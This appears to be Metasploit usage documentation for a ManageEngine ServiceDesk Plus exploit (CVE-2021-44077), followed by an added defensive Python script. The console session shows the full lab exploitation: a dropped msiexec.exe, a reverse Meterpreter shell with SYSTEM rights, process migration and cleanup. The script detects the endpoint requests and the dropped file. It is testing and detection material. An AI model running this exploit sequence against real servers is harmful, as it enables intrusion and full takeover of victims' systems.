## Vulnerable Application

### Setup

Follow the [Installing ServiceDesk Plus] guide, in particular [Installation on Windows]. You can skip licensing.

1. Download [ManageEngine_ServiceDesk_Plus_64bit.exe]
1. Run the installer
1. Start the server
1. Hax

Note that build 11305 is not exploitable with this module, so don't download that one; the link above points at build 11301, which is the build used in the scenario below.

[Installing ServiceDesk Plus]: https://help.servicedeskplus.com/installing-servicedesk-plus
[Installation on Windows]: https://help.servicedeskplus.com/introduction/installation-and-getting-started.html
[ManageEngine_ServiceDesk_Plus_64bit.exe]: https://archives.manageengine.com/service-desk/11301/ManageEngine_ServiceDesk_Plus_64bit.exe

## Verification Steps

Follow [Setup](#setup) and [Scenarios](#scenarios).

## Options

This module adds no options of its own. Only the standard HTTP client options apply (RHOSTS, RPORT, SSL, TARGETURI, VHOST, Proxies), as shown in the `options` output in the scenario below. RPORT defaults to 8080, the ServiceDesk Plus default.

## Scenarios

### ServiceDesk Plus 11301 on Windows Server 2016

```
msf6 > use exploit/windows/http/manageengine_servicedesk_plus_cve_2021_44077
[*] Using configured payload windows/x64/meterpreter_reverse_tcp
msf6 exploit(windows/http/manageengine_servicedesk_plus_cve_2021_44077) > options

Module options (exploit/windows/http/manageengine_servicedesk_plus_cve_2021_44077):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      8080             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path
   VHOST                       no        HTTP server virtual host


Payload options (windows/x64/meterpreter_reverse_tcp):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   EXITFUNC    process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   EXTENSIONS                   no        Comma-separate list of extensions to load
   EXTINIT                      no        Initialization strings for extensions
   LHOST                        yes       The listen address (an interface may be specified)
   LPORT       4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Dropper


msf6 exploit(windows/http/manageengine_servicedesk_plus_cve_2021_44077) > set rhosts 172.16.57.222
rhosts => 172.16.57.222
msf6 exploit(windows/http/manageengine_servicedesk_plus_cve_2021_44077) > set lhost 172.16.57.1
lhost => 172.16.57.1
msf6 exploit(windows/http/manageengine_servicedesk_plus_cve_2021_44077) > run

[*] Started reverse TCP handler on 172.16.57.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. /RestAPI/ImportTechnicians is present.
[*] Uploading msiexec.exe
[+] Successfully uploaded msiexec.exe
[*] Executing msiexec.exe
[!] Yo, don't forget to clean up ..\bin\msiexec.exe
[*] Meterpreter session 1 opened (172.16.57.1:4444 -> 172.16.57.222:50095 ) at 2021-12-23 11:28:47 -0600

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-PRMQDT3BCJI
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > pwd
C:\Program Files\ManageEngine\ServiceDesk\site24x7
meterpreter > migrate -N spoolsv.exe
[*] Migrating from 4816 to 1728...
[*] Migration completed successfully.
meterpreter > rm 'C:\Program Files\ManageEngine\ServiceDesk\site24x7\..\bin\msiexec.exe'
meterpreter >
```
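
The session above leaves two things a defender can look for: requests to the `/RestAPI/ImportTechnicians` endpoint the check probes, and the `msiexec.exe` the module drops into the ServiceDesk `bin` directory (the `[!]` cleanup warning). The script below is an added example, not code from the Metasploit module or from ServiceDesk Plus. It assumes the web access log is in Apache common/combined format (the regex is not from the page) and that the caller supplies the install root; the log lines it ships with are constructed, not captured from a real server.

```python
"""Defender-side check for what this scenario leaves behind.

Added example, not code from the Metasploit module or from ServiceDesk
Plus. It looks for the two artifacts visible in the session output above:
requests to the unauthenticated /RestAPI/ImportTechnicians endpoint in a
web access log, and an msiexec.exe dropped under the ServiceDesk Plus
install tree (the module's own "don't forget to clean up
..\\bin\\msiexec.exe" warning).

Assumptions not taken from the page: the access log is in Apache
common/combined format, and the install root is supplied by the caller.
"""
import hashlib
import re
import tempfile
from pathlib import Path

SUSPECT_PATH = "/RestAPI/ImportTechnicians"

# Common log format prefix; combined-format lines match too because the
# pattern is not anchored at the end of the line.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def find_import_technicians_hits(log_lines):
    """Return (client, timestamp, method, status) for each request to the
    ImportTechnicians endpoint. On a build this module exploits the
    endpoint needs no authentication, so every hit deserves a look."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line, skip it rather than fail
        path = m.group("path").split("?", 1)[0]  # drop any query string
        if path.lower() == SUSPECT_PATH.lower():
            hits.append((m.group("client"), m.group("ts"),
                         m.group("method"), int(m.group("status"))))
    return hits


def find_dropped_msiexec(install_root):
    """Return (path, sha256) for every msiexec.exe under the install root.
    The real msiexec.exe lives in System32/SysWOW64; a copy under the
    ServiceDesk tree is the dropper's payload and should not be there.
    The whole tree is walked, not just bin, in case it was moved."""
    findings = []
    for p in Path(install_root).rglob("*"):
        if p.is_file() and p.name.lower() == "msiexec.exe":
            digest = hashlib.sha256(p.read_bytes()).hexdigest()
            findings.append((str(p), digest))
    return findings


# Constructed sample log lines, not captured from a real server.
CONSTRUCTED_LOG = [
    '172.16.57.1 - - [23/Dec/2021:11:28:40 -0600] '
    '"GET /RestAPI/ImportTechnicians HTTP/1.1" 200 42',
    '172.16.57.1 - - [23/Dec/2021:11:28:45 -0600] '
    '"POST /RestAPI/ImportTechnicians?x=1 HTTP/1.1" 200 91',
    '172.16.57.50 - - [23/Dec/2021:11:30:02 -0600] '
    '"GET /HomePage.do HTTP/1.1" 200 8231',
    'garbage line that does not parse',
]


def run_demo():
    """Build a throwaway install tree with a planted bin/msiexec.exe
    (constructed content, not a real binary), run both checks, and
    return (log_hits, file_findings)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "ServiceDesk"
        (root / "bin").mkdir(parents=True)
        (root / "site24x7").mkdir()
        (root / "bin" / "msiexec.exe").write_bytes(b"MZ-not-a-real-binary")
        file_findings = find_dropped_msiexec(root)
    log_hits = find_import_technicians_hits(CONSTRUCTED_LOG)
    return log_hits, file_findings


if __name__ == "__main__":
    hits, files = run_demo()
    for hit in hits:
        print("ImportTechnicians request:", hit)
    for path, digest in files:
        print("dropped msiexec.exe:", path, digest)
```

On a real host, point `find_dropped_msiexec` at `C:\Program Files\ManageEngine\ServiceDesk` and feed `find_import_technicians_hits` the server's access log; hash matches against the Metasploit payload are only meaningful if you also capture the dropped file before deleting it.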
